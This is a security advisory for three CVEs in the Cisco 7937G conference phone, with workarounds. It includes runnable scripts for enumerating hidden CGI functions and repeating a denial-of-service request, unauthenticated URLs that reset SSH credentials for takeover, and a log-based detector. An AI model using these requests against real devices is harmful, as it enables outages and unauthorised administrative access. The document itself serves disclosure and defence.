Multiple CVEs: Cisco Unified IP Conference Station 7937G
Cisco: CVE-2020-16139, CVE-2020-16138, CVE-2020-16137: Unified IP Conference Station 7937G
Multiple vulnerabilities were discovered in the Cisco Unified IP Conference Station 7937G: two denial-of-service flaws (CVE-2020-16139, CVE-2020-16138) and a path to privilege escalation (CVE-2020-16137) via the web administration portal. Since this product has reached end-of-support/end-of-life, Cisco will not provide updates to the affected firmware. Workarounds that mitigate each of these findings are given below.
Background
Most of the issues discovered stem from the device's use of the localmenus.cgi script. While testing the device, it was noted that the same XML menu generation done in the web administration portal was mirrored on the physical device's menu system. This led to the belief that whatever you could do administratively on the physical device could also be done through the web interface.
localmenus.cgi takes a parameter, func, which requires an integer value. Capturing the request and enumerating the likely value range 0-1000, I was able to isolate functionality that is not exposed in the web interface. This includes benign and silly tricks like changing volumes, contrast values, ringtones, etc. It also allows for other unsavory actions.
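The sweep described above, as an added example (this is not the author's published tooling). It assumes the device answers unauthenticated HTTP GETs on port 80, that BASE is replaced with the real address, and that unused func values all return the same default page, so grouping responses by digest isolates the few values that do something distinct:

```python
"""Enumerate localmenus.cgi func values and group them by response.

Added example, not the author's published tooling. Assumes unauthenticated
HTTP on port 80 (BASE is a placeholder) and that unused func values share
one default page, so the distinct responses are the interesting ones.
"""
import hashlib
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Optional

BASE = "http://DEVICE-IP"  # placeholder, replace with the target address

# A fetch callable returns the response body, or None if the request failed.
Fetch = Callable[[str], Optional[bytes]]


def http_get(url: str, timeout: float = 5.0) -> Optional[bytes]:
    """Plain GET; None on transport or HTTP error so one bad value does
    not abort the whole sweep."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read()
    except (urllib.error.URLError, OSError):
        return None


def enumerate_funcs(fetch: Fetch, base: str = BASE,
                    lo: int = 0, hi: int = 1000) -> Dict[str, List[int]]:
    """Request func=lo..hi and map each response digest to the func values
    that produced it."""
    groups: Dict[str, List[int]] = {}
    for func in range(lo, hi + 1):
        body = fetch(f"{base}/localmenus.cgi?func={func}")
        if body is None:
            continue
        digest = hashlib.sha256(body).hexdigest()
        groups.setdefault(digest, []).append(func)
    return groups


def interesting_funcs(groups: Dict[str, List[int]],
                      max_group: int = 5) -> List[int]:
    """Func values whose response is shared by at most max_group values;
    the large group is the default page and is dropped."""
    hits: List[int] = []
    for funcs in groups.values():
        if len(funcs) <= max_group:
            hits.extend(funcs)
    return sorted(hits)


if __name__ == "__main__":
    for func in interesting_funcs(enumerate_funcs(http_get)):
        print(f"func={func}")
```

The fetch callable is injected so the grouping logic can be exercised against a fake responder without a device on the wire; against a real 7937G, expect the sweep to take a while and keep the request rate low, since the same script is one request away from the denial-of-service described next.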
CVE-2020-16139: Denial-of-Service
The first of the two denial-of-service vulnerabilities is triggered by accessing the device's ping functionality through the web administration portal. It can be found by iterating the func parameter and navigating to func=607. That page directs you to another valid parameter combination for executing the ping request, func=609&rphl=1&data=. Here data is the parameter of interest, as it is where you would normally place the IP address to ping. For my testing I instead sent it 46 A characters. Normal use of the ping function through the physical menu system clears the ping output after the task completes; executing it directly like this leaves the response information in place.
/localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Sending the request repeatedly causes the device to power cycle itself at around the point where the resulting content-length reaches about 16,316. This vulnerability can be mitigated by disabling the web interface in your configuration files.
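An added reproduction harness for this behaviour (not the author's PoC) that records the content-length of every response so you can see the leftover ping output accumulating toward the reboot point. It assumes the ping page is reachable with the unauthenticated GET above, that the portal stops answering once the device power cycles, and that BASE is replaced with the real address:

```python
"""Reproduce CVE-2020-16139 while recording how the response grows.

Added example, not the author's PoC. Assumes the unauthenticated GET shown
in the write-up, that leftover ping output makes each response larger than
the last, and that the portal stops answering when the device power cycles.
"""
import urllib.error
import urllib.request
from typing import Callable, List, Optional, Tuple

BASE = "http://DEVICE-IP"  # placeholder, replace with the target address
PING_PATH = "/localmenus.cgi?func=609&rphl=1&data=" + "A" * 46
REBOOT_LENGTH = 16_316  # content-length at which the write-up saw the reboot

# A fetch callable returns the response's content-length, or None if the
# device did not answer.
Fetch = Callable[[str], Optional[int]]


def http_get_length(url: str, timeout: float = 5.0) -> Optional[int]:
    """GET the URL and return its Content-Length (body size if the header
    is missing); None when the device does not answer."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            body = resp.read()
            header = resp.headers.get("Content-Length")
            return int(header) if header is not None else len(body)
    except (urllib.error.URLError, OSError, ValueError):
        return None


def hammer_ping(fetch: Fetch, base: str = BASE, max_requests: int = 2000,
                grace: int = 3) -> Tuple[List[int], bool]:
    """Send the ping request until the device stops answering.

    Returns the content-lengths seen and True if the device went away
    (grace consecutive failed requests) before max_requests was reached.
    """
    lengths: List[int] = []
    failures = 0
    for _ in range(max_requests):
        size = fetch(base + PING_PATH)
        if size is None:
            failures += 1
            if failures >= grace:
                return lengths, True
            continue
        failures = 0
        lengths.append(size)
    return lengths, False


def output_accumulates(lengths: List[int]) -> bool:
    """True if no response was smaller than the one before it, i.e. the
    ping output really is left behind rather than cleared."""
    return all(b >= a for a, b in zip(lengths, lengths[1:]))


if __name__ == "__main__":
    seen, died = hammer_ping(http_get_length)
    last = seen[-1] if seen else "n/a"
    print(f"answered: {len(seen)}, last content-length: {last}, dropped: {died}")
    if seen and seen[-1] >= REBOOT_LENGTH:
        print("reached the size at which the write-up observed a power cycle")
```

Treat the last recorded length as the data point to compare against the 16,316 figure above; if output_accumulates() is False against your unit, the output is being cleared and you are looking at a different firmware behaviour than the one described here.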
CVE-2020-16138: Denial-of-Service
The second denial-of-service vulnerability is caused by mishandling of SSH connection attempts made with unsupported key exchange algorithms. The specific cause of the problem is not known as of yet, and further investigation will be done to try to isolate it. The following algorithms are supported, and connecting with any of them will avoid triggering the DoS:
diffie-hellman-group-exchange-sha1
diffie-hellman-group14-sha1
diffie-hellman-group1-sha1
With an up-to-date SSH client, connecting to the device with default options will cause the DoS. Unlike the previous vulnerability, the device becomes inoperable and does not restart until it is power cycled manually. This situation can be mitigated by disabling SSH access to the device in your configuration files.
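Because the write-up does not pin down what in an unsupported key exchange hangs the device, a safe way to check what a unit actually offers is to never propose anything: send only an SSH version string, read the server's own KEXINIT (which the server sends unprompted after the version exchange, RFC 4253 section 7.1) and close. The following is an added example, not tooling from the write-up; SAMPLE_KEXINIT is a constructed packet (zero cookie, illustrative cipher and MAC lists) so the parser runs offline, and the -oKexAlgorithms value it produces pins the client to exactly the methods the device lists rather than appending to the client's defaults:

```python
"""Read a server's SSH_MSG_KEXINIT without proposing any algorithms.

Added example, not from the write-up. Sends only a version string, reads
the server's KEXINIT (RFC 4253 section 7.1), and closes. SAMPLE_KEXINIT
is a constructed packet with a zero cookie for offline use.
"""
import socket
import struct
from typing import Dict, List, Optional, Tuple

SSH_MSG_KEXINIT = 20
# Key exchange methods the write-up lists as supported by the device.
SAFE_KEX = ("diffie-hellman-group-exchange-sha1",
            "diffie-hellman-group14-sha1",
            "diffie-hellman-group1-sha1")
# The ten name-lists of a KEXINIT, in wire order.
KEXINIT_FIELDS = (
    "kex_algorithms", "server_host_key_algorithms",
    "encryption_algorithms_client_to_server", "encryption_algorithms_server_to_client",
    "mac_algorithms_client_to_server", "mac_algorithms_server_to_client",
    "compression_algorithms_client_to_server", "compression_algorithms_server_to_client",
    "languages_client_to_server", "languages_server_to_client",
)


def _name_list(buf: bytes, off: int) -> Tuple[List[str], int]:
    (n,) = struct.unpack_from(">I", buf, off)
    off += 4
    raw = buf[off:off + n].decode("ascii")
    return [s for s in raw.split(",") if s], off + n


def parse_kexinit(packet: bytes) -> Dict[str, List[str]]:
    """Parse one unencrypted SSH binary packet (RFC 4253 section 6)
    carrying a KEXINIT and return its name-lists."""
    (plen,) = struct.unpack_from(">I", packet, 0)
    padding = packet[4]
    payload = packet[5:5 + plen - padding - 1]
    if not payload or payload[0] != SSH_MSG_KEXINIT:
        raise ValueError("not a KEXINIT packet")
    off = 1 + 16  # message id, then the 16-byte cookie
    lists: Dict[str, List[str]] = {}
    for field in KEXINIT_FIELDS:
        lists[field], off = _name_list(payload, off)
    return lists


def build_kexinit(lists: Dict[str, List[str]]) -> bytes:
    """Build a KEXINIT packet with a zero cookie (used for the constructed
    sample; a real server's cookie is random)."""
    payload = bytes([SSH_MSG_KEXINIT]) + b"\x00" * 16
    for field in KEXINIT_FIELDS:
        names = ",".join(lists.get(field, [])).encode("ascii")
        payload += struct.pack(">I", len(names)) + names
    payload += b"\x00" + b"\x00\x00\x00\x00"  # first_kex_packet_follows, reserved
    pad = 8 - (len(payload) + 5) % 8
    if pad < 4:
        pad += 8
    body = bytes([pad]) + payload + b"\x00" * pad
    return struct.pack(">I", len(body)) + body


def kex_client_option(server_kex: List[str]) -> Optional[str]:
    """-oKexAlgorithms value naming only the device-supported methods the
    server actually offers, or None if it offers none of them."""
    usable = [k for k in server_kex if k in SAFE_KEX]
    return "-oKexAlgorithms=" + ",".join(usable) if usable else None


def probe_server_kex(host: str, port: int = 22, timeout: float = 5.0) -> Dict[str, List[str]]:
    """Version exchange only, then read the server's KEXINIT and close."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        stream = sock.makefile("rb")
        line = stream.readline()
        while line and not line.startswith(b"SSH-"):  # text before the banner is allowed
            line = stream.readline()
        sock.sendall(b"SSH-2.0-kexprobe_0.1\r\n")
        header = stream.read(4)
        (plen,) = struct.unpack(">I", header)
        return parse_kexinit(header + stream.read(plen))


# Constructed sample: a server offering only the device's three methods.
SAMPLE_KEXINIT = build_kexinit({
    "kex_algorithms": list(SAFE_KEX),
    "server_host_key_algorithms": ["ssh-rsa"],
    "encryption_algorithms_client_to_server": ["aes128-cbc"],
    "encryption_algorithms_server_to_client": ["aes128-cbc"],
    "mac_algorithms_client_to_server": ["hmac-sha1"],
    "mac_algorithms_server_to_client": ["hmac-sha1"],
    "compression_algorithms_client_to_server": ["none"],
    "compression_algorithms_server_to_client": ["none"],
})

if __name__ == "__main__":
    import sys
    lists = probe_server_kex(sys.argv[1]) if len(sys.argv) > 1 else parse_kexinit(SAMPLE_KEXINIT)
    print("server kex:", ", ".join(lists["kex_algorithms"]))
    print("client option:", kex_client_option(lists["kex_algorithms"]))
```

Run it with the device address as the first argument to probe a live unit, or with no argument to parse the constructed sample. Pinning with = instead of + means the client never offers the device a method it did not list; whether the + form in the write-up's ssh command line is enough on every client version is something to confirm against your own unit before relying on it.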
CVE-2020-16137: Privilege Escalation
The last of the vulnerabilities found so far is a path to privilege escalation. It relies on both web access and SSH access being enabled. We return to the web interface to take advantage of other hidden functionality in the localmenus.cgi script. Navigating to func=403&set=401 and func=403&set=402 reveals menus for changing the SSH username and password respectively. These pages overwrite any currently set credentials for administrative SSH access, or set credentials if none were set previously.
To change the username, replace the values of name1 and name2 with whatever you want the new username to be:
/localmenus.cgi?func=403&set=401&name1=test&name2=test
To change the password, replace the values of pwd1 and pwd2 with whatever you want the new password to be:
/localmenus.cgi?func=403&set=402&pwd1=test&pwd2=test
Now connect over SSH to the now-accessible administrative console, specifying a key exchange algorithm the device supports:
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 test@DEVICE-IP
To mitigate this issue, it is recommended that either SSH access or web access be disabled. If SSH access is needed for legitimate purposes, disabling web access removes an attacker's ability to reset the username and password arbitrarily, though the device remains vulnerable to the SSH denial-of-service (CVE-2020-16138) described above.
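Where the workarounds cannot be applied immediately, the three issues are easy to spot in HTTP request logs captured in front of the phone (a proxy, IDS or span-port capture; the phone itself is not assumed to log anything). The following detection is an added example, not from the write-up: it keys only on the func, set and data parameters documented above, and the log lines it runs over are constructed in Common Log Format to show an ordinary portal request, a func sweep, the credential reset and the repeated ping:

```python
"""Flag localmenus.cgi abuse in HTTP request logs captured in front of the
phone. Added example, not from the write-up; SAMPLE_LOG is constructed.
"""
import ipaddress
import re
from collections import defaultdict
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

CLF = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                 r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+')


def classify(path: str) -> Optional[str]:
    """Label one request path if it hits a function from the write-up."""
    parts = urlsplit(path)
    if not parts.path.endswith("/localmenus.cgi"):
        return None
    q = parse_qs(parts.query)
    func, setv = q.get("func", [""])[0], q.get("set", [""])[0]
    if func == "403" and setv in ("401", "402"):
        what = "username" if setv == "401" else "password"
        return f"CVE-2020-16137: SSH {what} reset via func=403&set={setv}"
    if func == "609":
        data = q.get("data", [""])[0]
        try:
            ipaddress.ip_address(data)  # legitimate use carries an address
            return "CVE-2020-16139: web ping (func=609)"
        except ValueError:
            return "CVE-2020-16139: web ping (func=609) with non-address data"
    return None


def scan_log(lines: List[str], sweep_threshold: int = 20,
             ping_threshold: int = 10) -> Dict[str, List[str]]:
    """Per-client findings: direct hits plus two rate-based patterns, a func
    sweep (many distinct values from one client) and a repeated web ping."""
    findings: Dict[str, List[str]] = defaultdict(list)
    funcs_seen: Dict[str, set] = defaultdict(set)
    pings: Dict[str, int] = defaultdict(int)
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue
        ip, path = m["ip"], m["path"]
        label = classify(path)
        if label and label not in findings[ip]:
            findings[ip].append(label)
        if label and label.startswith("CVE-2020-16139"):
            pings[ip] += 1
        parts = urlsplit(path)
        q = parse_qs(parts.query)
        if parts.path.endswith("/localmenus.cgi") and "func" in q:
            funcs_seen[ip].add(q["func"][0])
    for ip, funcs in funcs_seen.items():
        if len(funcs) >= sweep_threshold:
            findings[ip].append(f"func sweep ({len(funcs)} distinct values)")
    for ip, n in pings.items():
        if n >= ping_threshold:
            findings[ip].append(f"repeated web ping ({n} requests, CVE-2020-16139 DoS pattern)")
    return dict(findings)


def _line(ip: str, seq: int, path: str) -> str:
    """Build one constructed CLF line; seq is seconds past 09:00:00."""
    return (f'{ip} - - [15/Aug/2020:09:{seq // 60:02d}:{seq % 60:02d} +0000] '
            f'"GET {path} HTTP/1.1" 200 512')


# Constructed sample traffic: an admin using the portal normally, then a
# client sweeping func values, resetting SSH credentials and hammering ping.
SAMPLE_LOG = [_line("10.0.0.20", 0, "/localmenus.cgi?func=200")]
SAMPLE_LOG += [_line("10.0.0.99", i + 1, f"/localmenus.cgi?func={i}") for i in range(30)]
SAMPLE_LOG += [_line("10.0.0.99", 40, "/localmenus.cgi?func=403&set=401&name1=test&name2=test"),
               _line("10.0.0.99", 41, "/localmenus.cgi?func=403&set=402&pwd1=test&pwd2=test")]
SAMPLE_LOG += [_line("10.0.0.99", 50 + i, "/localmenus.cgi?func=609&rphl=1&data=" + "A" * 46)
               for i in range(12)]

if __name__ == "__main__":
    for ip, labels in scan_log(SAMPLE_LOG).items():
        for label in labels:
            print(f"{ip}: {label}")
```

Any hit on func=403&set=401 or 402 from a source that is not your management host is worth an immediate check of the device's SSH credentials, since the write-up notes those pages overwrite whatever was set before. The thresholds are assumptions; tune them to how often your own tooling touches the portal.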
Public Exploit Proofs of Concept
As part of this publication, three Metasploit modules were released to test for the vulnerabilities discovered, as well as an all-in-one exploit script that can be used when Metasploit is not preferred. They can be found here: Cisco-7937G-PoCs
References
- Original Post
- CVE-2020-16137: https://nvd.nist.gov/vuln/detail/CVE-2020-16137
- CVE-2020-16138: https://nvd.nist.gov/vuln/detail/CVE-2020-16138
- CVE-2020-16139: https://nvd.nist.gov/vuln/detail/CVE-2020-16139